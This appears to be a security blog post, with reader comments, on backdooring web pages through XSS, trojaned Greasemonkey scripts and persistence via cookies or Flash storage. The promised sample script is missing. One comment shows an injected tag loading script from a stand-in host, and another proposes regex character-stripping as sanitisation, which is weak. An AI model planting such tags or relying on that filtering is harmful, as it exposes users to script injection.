Backdooring Web Pages
The most obvious way of maliciously infecting web pages is to perform Cross-Site Scripting (XSS). In practice, XSS vulnerabilities can be persistent and non-persistent. Depending on the type, the attacker has various degree of control. The persistent vector produces better results and it lasts longer, where non-persistent vector lasts a single hit, although it is possible for the attacker to take control of the user browser by using other techniques. Here I am trying to explore another vector that can permanently take control of the user web experience.
IMHO, there are three types of web page backdoors: non-persistent, persistent and global persistent. Non-persistent backdoors occur on a single XSS vulnerable page (hit). Persistent backdoors a bit better because they can occur on one or more XSS vulnerable pages most probably coming from the same domain (site). Global persistent backdoors occur on all domains (sites) and in theory they can last forever.
Global persistent backdoors do not rely on the server being vulnerable to XSS or any other type of server related vulnerability. Global persistent backdoors exploit browser functionalities.
In order to install global persistent backdoor the attacker can exploit known browser vulnerabilities which allow silent installation of new functionalities, exploit known extension vulnerabilities which allow Cross Context Scripting (execution of malicious web content in the browser context) or exploit the user's trust (trojaning).
The first two scenarios rely on a browser or a browser's extensions being vulnerable. Finding those vulnerabilities may take some time and it might not be that feasible, not to mention the fact that once an attacker exploits them the entire system probably will be subjected to attacker's wishes. On the other hand, the last scenario tricks the user into performing something legitimate which in fact turns to be something malicious (trojaning). This quite old trick but very successful and widely exploited as well.
Exploiting the user's trust in order to install backdoor could be achieved in several ways each one of which provides various degree of success. The first one is asking the user to install a browser extension. This type of scenario could be successful in browsers that do not have central extension repositories. In that respect IE is probably the most vulnerable. Opera, with its Web Widgets could potentially fall into the same category. On the other hand, Firefox users tend to install extensions from known sources such as
addons.mozilla.org, so they are the least vulnerable.
The second scenario occurs when the attacker is asking the user to install extensions of extension. This one is far more trusted since extensions of extension are believed to be harmless. Firefox's and IE's Greasemonkey extension and Opera's Web Widgets are good examples of those kinds of scenarios.
To some respect, security aware users could detect malicious scripts so they are less vulnerable. On the other hand the average user trusts the security model of the browser, so trojaned Greasemonkey script can be quite easily installed. A sample trojaned script can contain something like the following:
This type of backdoor has a big problem. Once the user finds that the Greasemonkey script (or the Web Widget) is not needed anymore, or that it contains malicious code, proper cleaning actions will be taken.
This is good but like any other malicious code, web page backdoors can assure the existence of hidden channels for reinstallation and further propagation. In that respect the backdoor could perform internal cross site scripting by poisoning cookies or flash objects such as The Flash Persistent Storage Model which is widely used in several AJAX frameworks. Other countermeasures can be taken as well such as taking advantage of the page caching issues. All of these are related to a discipline known as DOM based Cross-site scripting.
- Do you trust what you are mashing up? If not, stop.
- Even if you trust who you are mashing up, do they allow user-generated content into their return results?
- Do you allow user-generated content into your results?
This is valid HTML; the only way to catch it is to parse your HTML before executing it, then whitelist the elements you want to keep. Brad
< script src="http://foobar.com/badscript.js" >
<age>(\d+)</age>is much more secure than parsing it with general purpose parser. You don't need blacklist or white list. In this example you expect something to be the way you want it to be. If it is not then it fails. I know that usually things are not that simple. The example above is suitable for data extraction. The hardest part is to perform data striping. However, stripping out special characters is sometimes as simple as the fowling
/<|>|&.*?;|(... here more rules ...)//. You can add a few more rules inside. I am far from thinking that these approaches are perfect. The list of possible problems is endless.